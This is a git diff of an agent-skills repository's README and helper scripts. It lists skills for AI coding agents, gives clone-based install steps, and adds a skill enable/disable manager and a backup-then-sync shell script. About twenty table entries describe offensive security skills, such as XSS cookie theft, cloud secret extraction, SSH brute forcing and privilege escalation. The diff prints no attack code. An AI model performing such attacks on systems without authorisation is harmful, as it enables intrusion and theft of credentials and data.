| **Brainstorming** | "You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. | `skills/brainstorming` |
| **Brand Guidelines (Anthropic)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-anthropic` |
| **Brand Guidelines (Community)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-community` |
| **Broken Authentication Testing** | This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". | `skills/broken-authentication` |
| **Browser Automation** | Browser automation with Playwright and Puppeteer. Testing, scraping, agentic control. | `skills/browser-automation` |
| **Browser Extension Builder** | Building browser extensions - Chrome, Firefox. Manifest v3, content scripts, monetization. | `skills/browser-extension-builder` |
| **BullMQ Specialist** | BullMQ for Redis-backed job queues, background processing in Node.js/TypeScript. | `skills/bullmq-specialist` |
| **Bun Development** | "Modern JavaScript/TypeScript development with Bun runtime. | `skills/bun-development` |
| **Burp Suite Web Application Testing** | This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". | `skills/burp-suite-testing` |
| **Canvas Design** | Create beautiful visual art in . | `skills/canvas-design` |
| **Claude Code Guide** | Master guide for using Claude Code effectively. | `skills/claude-code-guide` |
| **Claude D3.js** | Creating interactive data visualisations using d3. | `skills/claude-d3js-skill` |
| **Clerk Auth** | Clerk auth implementation, middleware, organizations, webhooks, user sync. | `skills/clerk-auth` |
| **Cloud Penetration Testing** | This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". | `skills/cloud-penetration-testing` |
| **Computer Use Agents** | AI agents that interact with computers like humans. Screen control, sandboxing. | `skills/computer-use-agents` |
| **Concise Planning** | Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist. | `skills/concise-planning` |
| **Competitor Alternatives** | Create compelling competitor comparison and alternative pages for SEO and conversions. | `skills/competitor-alternatives` |
| **Content Creator** | Create SEO-optimized marketing content with consistent brand voice. | `skills/content-creator` |
| **Context Window Management** | Managing LLM context windows. Summarization, trimming, routing. | `skills/context-window-management` |
| **Conversation Memory** | Persistent memory for LLM conversations. Short-term, long-term, entity-based memory. | `skills/conversation-memory` |
| **Core Components** | Core component library and design system patterns. | `skills/core-components` |
| **Copy Editing** | Edit and polish existing marketing copy with a systematic seven-sweeps framework. | `skills/copy-editing` |
| **Copywriting** | Write compelling marketing copy for homepages, landing pages, pricing pages, and feature pages. | `skills/copywriting` |
| **CrewAI** | Role-based multi-agent framework. Agent design, task definition, crew orchestration. | `skills/crewai` |
| **Cross-Site Scripting and HTML Injection Testing** | This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". | `skills/xss-html-injection` |
| **Discord Bot Architect** | Production Discord bots. Discord.js, Pycord, slash commands, sharding. | `skills/discord-bot-architect` |
| **Dispatching Parallel Agents** | Use when facing 2+ independent tasks that can be worked on without shared state or sequential dependencies. | `skills/dispatching-parallel-agents` |
| **Doc Co-authoring** | Guide users through a structured workflow for co-authoring documentation. | `skills/doc-coauthoring` |
| **DOCX (Official)** | "Comprehensive document creation, editing, and analysis with support for tracked changes, comments, formatting preservation, and text extraction. | `skills/docx-official` |
| **Email Sequence** | Create and optimize email sequences, drip campaigns, and lifecycle email programs. | `skills/email-sequence` |
| **Email Systems** | Transactional email, marketing automation, deliverability, infrastructure. | `skills/email-systems` |
| **Ethical Hacking Methodology** | This skill should be used when the user asks to "learn ethical hacking", "understand penetration testing lifecycle", "perform reconnaissance", "conduct security scanning", "exploit vulnerabilities", or "write penetration test reports". | `skills/ethical-hacking-methodology` |
| **Executing Plans** | Use when you have a written implementation plan to execute in a separate session with review checkpoints. | `skills/executing-plans` |
| **File Organizer** | Intelligently organizes files and folders by understanding context, finding duplicates, and suggesting better organizational structures. | `skills/file-organizer` |
| **File Path Traversal Testing** | This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". | `skills/file-path-traversal` |
| **File Uploads** | File uploads and cloud storage. S3, Cloudflare R2, presigned URLs. | `skills/file-uploads` |
| **Finishing Dev Branch** | Use when implementation is complete, all tests pass, and you need to decide how to integrate the work - guides completion of development work by presenting structured options for merge, PR, or cleanup. | `skills/finishing-a-development-branch` |
| **Firebase** | Firebase Auth, Firestore, Realtime Database, Cloud Functions, Storage. | `skills/firebase` |
| **Form CRO** | Optimize lead capture forms, contact forms, demo request forms for higher conversion rates. | `skills/form-cro` |
| **Free Tool Strategy** | Plan and build free tools for marketing, lead generation, and SEO value. | `skills/free-tool-strategy` |
| **Frontend Design** | Create distinctive, production-grade frontend interfaces with high design quality. | `skills/frontend-design` |
| **Frontend Guidelines** | Frontend development guidelines for React/TypeScript applications. | `skills/frontend-dev-guidelines` |
| **GCP Cloud Run** | Serverless on GCP. Cloud Run services and functions, Pub/Sub. | `skills/gcp-cloud-run` |
| **Git Pushing** | Stage, commit, and push git changes with conventional commit messages. | `skills/git-pushing` |
| **GitHub Workflow Automation** | "Automate GitHub workflows with AI assistance. | `skills/github-workflow-automation` |
| **GraphQL** | Schema design, resolvers, DataLoader, federation, Apollo/urql integration. | `skills/graphql` |
| **HTML Injection Testing** | This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". | `skills/html-injection-testing` |
| **HubSpot Integration** | HubSpot CRM integration. OAuth, CRM objects, webhooks, custom objects. | `skills/hubspot-integration` |
| **IDOR Vulnerability Testing** | This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data. | `skills/idor-testing` |
| **Inngest** | Inngest for serverless background jobs, event-driven workflows. | `skills/inngest` |
| **Interactive Portfolio** | Building portfolios that land jobs. Developer, designer portfolios. | `skills/interactive-portfolio` |
| **Internal Comms (Anthropic)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-anthropic` |
| **Internal Comms (Community)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-community` |
| **JavaScript Mastery** | "Comprehensive JavaScript reference covering 33+ essential concepts every developer should know. | `skills/javascript-mastery` |
| **Kaizen** | Guide for continuous improvement, error proofing, and standardization. | `skills/kaizen` |
| **Langfuse** | Open-source LLM observability. Tracing, prompt management, evaluation. | `skills/langfuse` |
| **LangGraph** | Stateful, multi-actor AI applications. Graph construction, persistence. | `skills/langgraph` |
| **Launch Strategy** | Plan product launches, feature announcements, and go-to-market strategies. | `skills/launch-strategy` |
| **Linux Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". | `skills/linux-privilege-escalation` |
| **Linux Shell Scripting** | This skill should be used when the user asks to "create bash scripts", "automate Linux tasks", "monitor system resources", "backup files", "manage users", or "write production shell scripts". | `skills/linux-shell-scripting` |
| **LLM App Patterns** | "Production-ready patterns for building LLM applications. | `skills/llm-app-patterns` |
| **Loki Mode** | Multi-agent autonomous startup system for Claude Code. | `skills/loki-mode` |
| **Marketing Ideas** | 140 proven SaaS marketing ideas and strategies organized by category. | `skills/marketing-ideas` |
| **Marketing Psychology** | 70+ mental models and psychological principles for marketing and persuasion. | `skills/marketing-psychology` |
| **MCP Builder** | Guide for creating high-quality MCP (Model Context Protocol) servers that enable LLMs to interact with external services through well-designed tools. | `skills/mcp-builder` |
| **Metasploit Framework** | This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". | `skills/metasploit-framework` |
| **Moodle External API Development** | Create custom external web service APIs for Moodle LMS. Use when implementing web services for course management, user tracking, quiz operations, or custom plugin functionality. Covers parameter validation, database operations, error handling, service registration, and Moodle coding standards. | `skills/moodle-external-api-development` |
| **Micro-SaaS Launcher** | Launching small SaaS products fast. Idea validation, MVP, pricing. | `skills/micro-saas-launcher` |
| **Neon Postgres** | Neon serverless Postgres, branching, connection pooling, Prisma integration. | `skills/neon-postgres` |
| **Network 101** | This skill should be used when the user asks to "set up a web server", "configure HTTP or HTTPS", "perform SNMP enumeration", "configure SMB shares", "test network services", or needs guidance on configuring and testing network services for penetration testing labs. | `skills/network-101` |
| **Next.js Supabase Auth** | Supabase Auth with Next.js App Router. Auth middleware. | `skills/nextjs-supabase-auth` |
| **NotebookLM** | Use this skill to query your Google NotebookLM notebooks directly from Claude Code for source-grounded, citation-backed answers from Gemini. | `skills/notebooklm` |
| **Notion Template Business** | Building and selling Notion templates. Design, pricing, marketing. | `skills/notion-template-business` |
| **Onboarding CRO** | Optimize post-signup onboarding, user activation, and time-to-value. | `skills/onboarding-cro` |
| **PDF (Official)** | Comprehensive PDF manipulation toolkit for extracting text and tables, creating new PDFs, merging/splitting documents, and handling forms. | `skills/pdf-official` |
| **Pentest Checklist** | This skill should be used when the user asks to "plan a penetration test", "create a security assessment checklist", "prepare for penetration testing", "define pentest scope", "follow security testing best practices", or needs a structured methodology for penetration testing engagements. | `skills/pentest-checklist` |
| **Pentest Commands** | This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references. | `skills/pentest-commands` |
| **Page CRO** | Conversion rate optimization for marketing pages - homepages, landing pages, pricing pages. | `skills/page-cro` |
| **Paid Ads** | Create and optimize paid ad campaigns on Google Ads, Meta, LinkedIn, and other platforms. | `skills/paid-ads` |
| **Paywall Upgrade CRO** | Optimize in-app paywalls, upgrade screens, and freemium conversion moments. | `skills/paywall-upgrade-cro` |
| **Personal Tool Builder** | Building custom tools. Rapid prototyping, local-first apps, CLI tools. | `skills/personal-tool-builder` |
| **Plaid Fintech** | Plaid API for banking. Link token flows, transactions, ACH. | `skills/plaid-fintech` |
| **Planning With Files** | Implements Manus-style file-based planning for complex tasks. | `skills/planning-with-files` |
| **Playwright Automation** | Complete browser automation with Playwright. | `skills/playwright-skill` |
| **Popup CRO** | Create and optimize popups, modals, and overlays for conversion. | `skills/popup-cro` |
| **PPTX (Official)** | "Presentation creation, editing, and analysis. | `skills/pptx-official` |
| **Privilege Escalation Methods** | This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems. | `skills/privilege-escalation-methods` |
| **Pricing Strategy** | Design pricing, packaging, and monetization strategy for SaaS products. | `skills/pricing-strategy` |
| **Product Toolkit** | Comprehensive toolkit for product managers including RICE prioritization, customer interview analysis, PRD templates, discovery frameworks, and go-to-market strategies. | `skills/product-manager-toolkit` |
| **Prompt Caching** | Caching strategies for LLM prompts. Anthropic caching, CAG. | `skills/prompt-caching` |
| **Prompt Engineer** | Designing prompts for LLM applications. Structure, evaluation. | `skills/prompt-engineer` |
| **Prompt Engineering** | Expert guide on prompt engineering patterns, best practices, and optimization techniques. | `skills/prompt-engineering` |
| **Prompt Library** | "Curated collection of high-quality prompts for various use cases. | `skills/prompt-library` |
| **Programmatic SEO** | Build SEO-driven pages at scale using templates and data. | `skills/programmatic-seo` |
| **RAG Engineer** | Building RAG systems. Embedding models, vector databases, chunking. | `skills/rag-engineer` |
| **RAG Implementation** | RAG patterns. Chunking, embeddings, vector stores. | `skills/rag-implementation` |
| **React Best Practices** | React and Next. | `skills/react-best-practices` |
| **React UI Patterns** | Modern React UI patterns for loading states, error handling, and data fetching. | `skills/react-ui-patterns` |
| **Receiving Code Review** | Use when receiving code review feedback, before implementing suggestions, especially if feedback seems unclear or technically questionable - requires technical rigor and verification, not performative agreement or blind implementation. | `skills/receiving-code-review` |
| **Red Team Tools and Methodology** | This skill should be used when the user asks to "follow red team methodology", "perform bug bounty hunting", "automate reconnaissance", "hunt for XSS vulnerabilities", "enumerate subdomains", or needs security researcher techniques and tool configurations from top bug bounty hunters. | `skills/red-team-tools` |
| **Referral Program** | Design referral programs, affiliate programs, and word-of-mouth strategies. | `skills/referral-program` |
| **Requesting Code Review** | Use when completing tasks, implementing major features, or before merging to verify work meets requirements. | `skills/requesting-code-review` |
| **Salesforce Development** | Salesforce integration, Apex development, Lightning components. | `skills/salesforce-development` |
| **Schema Markup** | Add structured data and JSON-LD schema markup for SEO and rich snippets. | `skills/schema-markup` |
| **Scroll Experience** | GSAP/Framer scroll-driven storytelling. Parallax effects. | `skills/scroll-experience` |
| **Security Scanning Tools** | This skill should be used when the user asks to "perform vulnerability scanning", "scan networks for open ports", "assess web application security", "scan wireless networks", "detect malware", "check cloud security", or "evaluate system compliance". | `skills/scanning-tools` |
| **Segment CDP** | Segment customer data platform. Event tracking, identity resolution. | `skills/segment-cdp` |
| **Senior Architect** | Comprehensive software architecture skill for designing scalable, maintainable systems using ReactJS, NextJS, NodeJS, Express, React Native, Swift, Kotlin, Flutter, Postgres, GraphQL, Go, Python. | `skills/senior-architect` |
| **Senior Fullstack** | Comprehensive fullstack development skill for building complete web applications with React, Next. | `skills/senior-fullstack` |
| **SEO Audit** | Audit technical and on-page SEO issues for better search rankings. | `skills/seo-audit` |
| **Shodan Reconnaissance and Pentesting** | This skill should be used when the user asks to "search for exposed devices on the internet," "perform Shodan reconnaissance," "find vulnerable services using Shodan," "scan IP ranges with Shodan," or "discover IoT devices and open ports. | `skills/shodan-reconnaissance` |
| **Shopify Apps** | Building Shopify apps. App Bridge, Polaris, webhooks. | `skills/shopify-apps` |
| **Shopify Development** | Build Shopify apps, extensions, themes using GraphQL Admin API, Shopify CLI, Polaris UI, and Liquid. Use when user asks about "shopify app", "checkout extension", "shopify theme", "liquid template", "polaris", "shopify graphql", "shopify webhook", or "metafields". | `skills/shopify-development` |
| **Signup Flow CRO** | Optimize signup, registration, and trial activation flows for higher conversions. | `skills/signup-flow-cro` |
| **Skill Creator** | Guide for creating effective skills. | `skills/skill-creator` |
| **Skill Developer** | Create and manage Claude Code skills following Anthropic best practices. | `skills/skill-developer` |
| **Slack Bot Builder** | Production Slack bots. Bolt framework, slash commands, modals. | `skills/slack-bot-builder` |
| **Slack GIF Creator** | Knowledge and utilities for creating animated GIFs optimized for Slack. | `skills/slack-gif-creator` |
| **SMTP Penetration Testing** | This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". | `skills/smtp-penetration-testing` |
| **Social Content** | Create and schedule social media content for LinkedIn, Twitter/X, and other platforms. | `skills/social-content` |
| **Software Architecture** | Guide for quality focused software architecture. | `skills/software-architecture` |
| **SQL Injection Testing** | This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". | `skills/sql-injection-testing` |
| **SQLMap Database Penetration Testing** | This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing. | `skills/sqlmap-database-pentesting` |
| **SSH Penetration Testing** | This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". | `skills/ssh-penetration-testing` |
| **Stripe Integration** | Stripe patterns. Checkout, subscriptions, payment intents, webhooks. | `skills/stripe-integration` |
| **Subagent Driven Dev** | Use when executing implementation plans with independent tasks in the current session. | `skills/subagent-driven-development` |
| **Systematic Debugging** | Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes. | `skills/systematic-debugging` |
| **TDD** | Use when implementing any feature or bugfix, before writing implementation code. | `skills/test-driven-development` |
| **Telegram Bot Builder** | Building Telegram bots. Bot API, inline mode, payments, Mini Apps. | `skills/telegram-bot-builder` |
| **Telegram Mini App** | TON Connect, Telegram Mini Apps, wallet integration. | `skills/telegram-mini-app` |
| **Test Fixing** | Run tests and systematically fix all failing tests using smart error grouping. | `skills/test-fixing` |
| **Testing Patterns** | Jest testing patterns, factory functions, mocking strategies, and TDD workflow. | `skills/testing-patterns` |
| **Theme Factory** | Toolkit for styling artifacts with a theme. | `skills/theme-factory` |
| **Top 100 Vulnerabilities** | This skill should be used when the user asks to "identify web application vulnerabilities", "explain common security flaws", "understand vulnerability categories", "learn about injection attacks", "review access control weaknesses", "analyze API security issues", "assess security misconfigurations", "understand client-side vulnerabilities", "examine mobile and IoT security flaws", or "reference the OWASP-aligned vulnerability taxonomy". | `skills/top-web-vulnerabilities` |
| **Trigger.dev** | Trigger.dev for serverless background jobs. Long-running tasks. | `skills/trigger-dev` |
| **Twilio Communications** | Twilio for SMS, voice, video. Programmable messaging, OTP. | `skills/twilio-communications` |
| **UI/UX Pro Max** | "UI/UX design intelligence. | `skills/ui-ux-pro-max` |
| **Upstash QStash** | Upstash QStash for serverless message queues. | `skills/upstash-qstash` |
| **Using Git Worktrees** | Use when starting feature work that needs isolation from current workspace or before executing implementation plans - creates isolated git worktrees with smart directory selection and safety verification. | `skills/using-git-worktrees` |
| **Using Superpowers** | Use when starting any conversation - establishes how to find and use skills, requiring Skill tool invocation before ANY response including clarifying questions. | `skills/using-superpowers` |
| **Vercel Deployment** | Vercel deployment. Edge functions, preview deployments. | `skills/vercel-deployment` |
| **Verification Before Completion** | Use when about to claim work is complete, fixed, or passing, before committing or creating PRs - requires running verification commands and confirming output before making any success claims; evidence before assertions always. | `skills/verification-before-completion` |
| **Viral Generator Builder** | Building shareable generators that go viral. | `skills/viral-generator-builder` |
| **Voice Agents** | Voice-based AI assistants. Speech-to-text, real-time conversation. | `skills/voice-agents` |
| **Voice AI Development** | Voice AI patterns. Wake words, streaming ASR, emotional TTS. | `skills/voice-ai-development` |
| **Web Artifacts** | Suite of tools for creating elaborate, multi-component claude. | `skills/web-artifacts-builder` |
| **Web Design Guidelines** | Review UI code for Web Interface Guidelines compliance. | `skills/web-design-guidelines` |
| **Webapp Testing** | Toolkit for interacting with and testing local web applications using Playwright. | `skills/webapp-testing` |
| **Windows Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Windows," "find Windows privesc vectors," "enumerate Windows for privilege escalation," "exploit Windows misconfigurations," or "perform post-exploitation privilege escalation. | `skills/windows-privilege-escalation` |
| **Wireshark Network Traffic Analysis** | This skill should be used when the user asks to "analyze network traffic with Wireshark", "capture packets for troubleshooting", "filter PCAP files", "follow TCP/UDP streams", "detect network anomalies", "investigate suspicious traffic", or "perform protocol analysis". | `skills/wireshark-analysis` |
| **WordPress Penetration Testing** | This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". | `skills/wordpress-penetration-testing` |
| **Workflow Automation** | "Design and implement automated workflows combining visual logic with custom code. | `skills/workflow-automation` |
| **Writing Plans** | Use when you have a spec or requirements for a multi-step task, before touching code. | `skills/writing-plans` |
| **Writing Skills** | Use when creating new skills, editing existing skills, or verifying skills work before deployment. | `skills/writing-skills` |
| **XLSX (Official)** | "Comprehensive spreadsheet creation, editing, and analysis with support for formulas, formatting, data analysis, and visualization. | `skills/xlsx-official` |
| **Zapier/Make Patterns** | No-code automation. Zapier, Make, n8n workflows. | `skills/zapier-make-patterns` |
> [!TIP]
> Use the `validate_skills.py` script in the `scripts/` directory to ensure all skills are properly formatted and ready for use.
@@ -93,10 +275,20 @@ Below is the complete list of available skills. Each skill folder contains a `SK
## Installation
To use these skills with **Antigravity** or **Claude Code**, clone this repository into your agent's skills directory:
To use these skills with **Claude Code**, **Gemini CLI**, **Codex CLI**, **Cursor**, **Antigravity**, or **OpenCode**, clone this repository into your agent's skills directory:
```bash
# Universal installation (works with most tools)
git clone https://github.com/sickn33/antigravity-awesome-skills.git .agent/skills
# Claude Code specific
git clone https://github.com/sickn33/antigravity-awesome-skills.git .claude/skills
# Gemini CLI specific
git clone https://github.com/sickn33/antigravity-awesome-skills.git .gemini/skills
# Cursor specific
git clone https://github.com/sickn33/antigravity-awesome-skills.git .cursor/skills
```
---
@@ -122,7 +314,9 @@ This collection would not be possible without the incredible work of the Claude
### Official Sources
- **[anthropics/skills](https://github.com/anthropics/skills)**: Official Anthropic skills repository - Document manipulation (DOCX, PDF, PPTX, XLSX), Brand Guidelines, Internal Communications.
- **[anthropics/claude-cookbooks](https://github.com/anthropics/claude-cookbooks)**: Official notebooks and recipes for building with Claude.
- **[vercel-labs/agent-skills](https://github.com/vercel-labs/agent-skills)**: Vercel Labs official skills - React Best Practices, Web Design Guidelines.
- **[openai/skills](https://github.com/openai/skills)**: OpenAI Codex skills catalog - Agent skills, Skill Creator, Concise Planning.
### Community Contributors
@@ -131,8 +325,17 @@ This collection would not be possible without the incredible work of the Claude
- **[diet103/claude-code-infrastructure-showcase](https://github.com/diet103/claude-code-infrastructure-showcase)**: Infrastructure and Backend/Frontend Guidelines.
- **[ChrisWiles/claude-code-showcase](https://github.com/ChrisWiles/claude-code-showcase)**: React UI patterns and Design Systems.
- **[travisvn/awesome-claude-skills](https://github.com/travisvn/awesome-claude-skills)**: Loki Mode and Playwright integration.
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite.
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite & Guide (Source for ~60 new skills).
- **[alirezarezvani/claude-skills](https://github.com/alirezarezvani/claude-skills)**: Senior Engineering and PM toolkit.
- **[karanb192/awesome-claude-skills](https://github.com/karanb192/awesome-claude-skills)**: A massive list of verified skills for Claude Code.
- **[zircote/.claude](https://github.com/zircote/.claude)**: Shopify development skill reference.
- **[vibeforge1111/vibeship-spawner-skills](https://github.com/vibeforge1111/vibeship-spawner-skills)**: AI Agents, Integrations, Maker Tools (57 skills, Apache 2.0).
- **[coreyhaines31/marketingskills](https://github.com/coreyhaines31/marketingskills)**: Marketing skills for CRO, copywriting, SEO, paid ads, and growth (23 skills, MIT).
### Inspirations
- **[f/awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts)**: Inspiration for the Prompt Library.
- **[leonardomso/33-js-concepts](https://github.com/leonardomso/33-js-concepts)**: Inspiration for JavaScript Mastery.
---
@@ -142,4 +345,18 @@ MIT License. See [LICENSE](LICENSE) for details.
---
**Keywords**: Claude Code, Antigravity, Agentic Skills, MCT, AI Agents, Autonomous Coding, Security Auditing, React Patterns.
**Keywords**: Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode, Agentic Skills, AI Coding Assistant, AI Agent Skills, MCP, MCT, AI Agents, Autonomous Coding, Security Auditing, React Patterns, LLM Tools, AI IDE, Coding AI, AI Pair Programming, Vibe Coding, Agentic Coding, AI Developer Tools.
---
## 🏷️ GitHub Topics
For repository maintainers, add these topics to maximize discoverability:
```text
claude-code, gemini-cli, codex-cli, antigravity, cursor, github-copilot, opencode,
agentic-skills, ai-coding, llm-tools, ai-agents, autonomous-coding, mcp,
ai-developer-tools, ai-pair-programming, vibe-coding, skill, skills, SKILL.md, rules.md, CLAUDE.md, GEMINI.md, CURSOR.md
claude-code, gemini-cli, codex-cli, antigravity, cursor, github-copilot, opencode,
agentic-skills, ai-coding, llm-tools, ai-agents, autonomous-coding, mcp
```

2
scripts/generate_index.py
View File

@@ -7,6 +7,8 @@ def generate_index(skills_dir, output_file):
skills = []
for root, dirs, files in os.walk(skills_dir):
# Skip .disabled directories
dirs[:] = [d for d in dirs if d != '.disabled']
if "SKILL.md" in files:
skill_path = os.path.join(root, "SKILL.md")
dir_name = os.path.basename(root)

119
scripts/skills_manager.py Executable file
View File

@@ -0,0 +1,119 @@
#!/usr/bin/env python3
"""
Skills Manager - Easily enable/disable skills locally
Usage:
python3 scripts/skills_manager.py list # List active skills
python3 scripts/skills_manager.py disabled # List disabled skills
python3 scripts/skills_manager.py enable SKILL # Enable a skill
python3 scripts/skills_manager.py disable SKILL # Disable a skill
"""
import sys
import os
from pathlib import Path
SKILLS_DIR = Path(__file__).parent.parent / "skills"
DISABLED_DIR = SKILLS_DIR / ".disabled"
def list_active():
"""List all active skills"""
print("🟢 Active Skills:\n")
skills = sorted([d.name for d in SKILLS_DIR.iterdir()
if d.is_dir() and not d.name.startswith('.')])
symlinks = sorted([s.name for s in SKILLS_DIR.iterdir()
if s.is_symlink()])
for skill in skills:
print(f"{skill}")
if symlinks:
print("\n📎 Symlinks:")
for link in symlinks:
target = os.readlink(SKILLS_DIR / link)
print(f"{link}{target}")
print(f"\n✅ Total: {len(skills)} skills + {len(symlinks)} symlinks")
def list_disabled():
"""List all disabled skills"""
if not DISABLED_DIR.exists():
print("❌ No disabled skills directory found")
return
print("⚪ Disabled Skills:\n")
disabled = sorted([d.name for d in DISABLED_DIR.iterdir() if d.is_dir()])
for skill in disabled:
print(f"{skill}")
print(f"\n📊 Total: {len(disabled)} disabled skills")
def enable_skill(skill_name):
"""Enable a disabled skill"""
source = DISABLED_DIR / skill_name
target = SKILLS_DIR / skill_name
if not source.exists():
print(f"❌ Skill '{skill_name}' not found in .disabled/")
return False
if target.exists():
print(f"⚠️ Skill '{skill_name}' is already active")
return False
source.rename(target)
print(f"✅ Enabled: {skill_name}")
return True
def disable_skill(skill_name):
"""Disable an active skill"""
source = SKILLS_DIR / skill_name
target = DISABLED_DIR / skill_name
if not source.exists():
print(f"❌ Skill '{skill_name}' not found")
return False
if source.name.startswith('.'):
print(f"⚠️ Cannot disable system directory: {skill_name}")
return False
if source.is_symlink():
print(f"⚠️ Cannot disable symlink: {skill_name}")
print(f" (Remove the symlink manually if needed)")
return False
DISABLED_DIR.mkdir(exist_ok=True)
source.rename(target)
print(f"✅ Disabled: {skill_name}")
return True
def main():
if len(sys.argv) < 2:
print(__doc__)
sys.exit(1)
command = sys.argv[1].lower()
if command == "list":
list_active()
elif command == "disabled":
list_disabled()
elif command == "enable":
if len(sys.argv) < 3:
print("❌ Usage: skills_manager.py enable SKILL_NAME")
sys.exit(1)
enable_skill(sys.argv[2])
elif command == "disable":
if len(sys.argv) < 3:
print("❌ Usage: skills_manager.py disable SKILL_NAME")
sys.exit(1)
disable_skill(sys.argv[2])
else:
print(f"❌ Unknown command: {command}")
print(__doc__)
sys.exit(1)
if __name__ == "__main__":
main()

114
scripts/sync_recommended_skills.sh Executable file
View File

@@ -0,0 +1,114 @@
#!/bin/bash
# sync_recommended_skills.sh
# Syncs only the 35 recommended skills from GitHub repo to local central library
set -e
# Paths
GITHUB_REPO="/Users/nicco/Antigravity Projects/antigravity-awesome-skills/skills"
LOCAL_LIBRARY="/Users/nicco/.gemini/antigravity/scratch/.agent/skills"
BACKUP_DIR="/Users/nicco/.gemini/antigravity/scratch/.agent/skills_backup_$(date +%Y%m%d_%H%M%S)"
# 35 Recommended Skills
RECOMMENDED_SKILLS=(
# Tier S - Core Development (13)
"systematic-debugging"
"test-driven-development"
"writing-skills"
"doc-coauthoring"
"planning-with-files"
"concise-planning"
"software-architecture"
"senior-architect"
"senior-fullstack"
"verification-before-completion"
"git-pushing"
"address-github-comments"
"javascript-mastery"
# Tier A - Your Projects (12)
"docx-official"
"pdf-official"
"pptx-official"
"xlsx-official"
"react-best-practices"
"web-design-guidelines"
"frontend-dev-guidelines"
"webapp-testing"
"playwright-skill"
"mcp-builder"
"notebooklm"
"ui-ux-pro-max"
# Marketing & SEO (1)
"content-creator"
# Corporate (4)
"brand-guidelines-anthropic"
"brand-guidelines-community"
"internal-comms-anthropic"
"internal-comms-community"
# Planning & Documentation (1)
"writing-plans"
# AI & Automation (5)
"workflow-automation"
"llm-app-patterns"
"autonomous-agent-patterns"
"prompt-library"
"github-workflow-automation"
)
echo "🔄 Sync Recommended Skills"
echo "========================="
echo ""
echo "📍 Source: $GITHUB_REPO"
echo "📍 Target: $LOCAL_LIBRARY"
echo "📊 Skills to sync: ${#RECOMMENDED_SKILLS[@]}"
echo ""
# Create backup
echo "📦 Creating backup at: $BACKUP_DIR"
cp -r "$LOCAL_LIBRARY" "$BACKUP_DIR"
echo "✅ Backup created"
echo ""
# Clear local library (keep README.md if exists)
echo "🗑️ Clearing local library..."
cd "$LOCAL_LIBRARY"
for item in */; do
rm -rf "$item"
done
echo "✅ Local library cleared"
echo ""
# Copy recommended skills
echo "📋 Copying recommended skills..."
SUCCESS_COUNT=0
MISSING_COUNT=0
for skill in "${RECOMMENDED_SKILLS[@]}"; do
if [ -d "$GITHUB_REPO/$skill" ]; then
cp -r "$GITHUB_REPO/$skill" "$LOCAL_LIBRARY/"
echo "$skill"
((SUCCESS_COUNT++))
else
echo " ⚠️ $skill (not found in repo)"
((MISSING_COUNT++))
fi
done
echo ""
echo "📊 Summary"
echo "=========="
echo "✅ Copied: $SUCCESS_COUNT skills"
echo "⚠️ Missing: $MISSING_COUNT skills"
echo "📦 Backup: $BACKUP_DIR"
echo ""
# Verify
FINAL_COUNT=$(find "$LOCAL_LIBRARY" -maxdepth 1 -type d ! -name "." | wc -l | tr -d ' ')
echo "🎯 Final count in local library: $FINAL_COUNT skills"
echo ""
